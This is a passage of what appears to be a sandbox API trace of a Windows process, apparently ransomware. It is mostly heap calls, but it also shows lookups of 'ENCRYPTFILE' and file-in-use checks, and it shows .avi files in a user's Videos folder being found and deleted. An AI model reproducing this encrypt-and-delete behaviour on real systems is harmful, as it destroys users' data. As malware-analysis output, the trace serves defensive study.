lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0102.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0102.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0102.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0102.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0102.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0102.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0102.314] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c81d70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2eec7760, ftLastAccessTime.dwHighDateTime=0x1d5ebb3, ftLastWriteTime.dwLowDateTime=0x2eec7760, ftLastWriteTime.dwHighDateTime=0x1d5ebb3, nFileSizeHigh=0x0, nFileSizeLow=0xb6e8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="IQ0I29Q qVTPWYuVmY.avi", cAlternateFileName="IQ0I29~1.AVI")) returned 0x41ac780 [0102.314] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\iq0i29q qvtpwyuvmy.avi")) returned 1 [0102.357] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c81d70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2eec7760, ftLastAccessTime.dwHighDateTime=0x1d5ebb3, ftLastWriteTime.dwLowDateTime=0x2eec7760, ftLastWriteTime.dwHighDateTime=0x1d5ebb3, nFileSizeHigh=0x0, nFileSizeLow=0xb6e8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="IQ0I29Q qVTPWYuVmY.avi", cAlternateFileName="IQ0I29~1.AVI")) returned 0 [0102.357] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0102.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0102.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0102.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0102.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0102.358] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0102.358] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0102.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0102.358] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0102.358] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0102.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0102.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0102.358] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0102.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0102.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0102.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0102.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0102.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x140) returned 0x43cccb0 [0102.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0102.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0102.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0102.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0102.360] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0102.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0102.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0102.360] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0102.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0102.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0102.360] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55e2cc60, ftCreationTime.dwHighDateTime=0x1d5e114, ftLastAccessTime.dwLowDateTime=0x5ea9f620, ftLastAccessTime.dwHighDateTime=0x1d5e493, ftLastWriteTime.dwLowDateTime=0x5ea9f620, ftLastWriteTime.dwHighDateTime=0x1d5e493, nFileSizeHigh=0x0, nFileSizeLow=0x5fd0, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="s4MXeg0Vr.avi", cAlternateFileName="S4MXEG~1.AVI")) returned 0x41ac780 [0102.361] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0102.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0102.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0102.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0102.361] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0102.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0102.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0102.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0102.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0102.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0102.362] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0102.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0102.362] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0102.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0102.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0102.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0102.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0102.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2830 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0102.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0102.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0102.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0102.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0102.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0102.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0102.364] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0102.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0102.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0102.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0102.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0102.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.366] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: 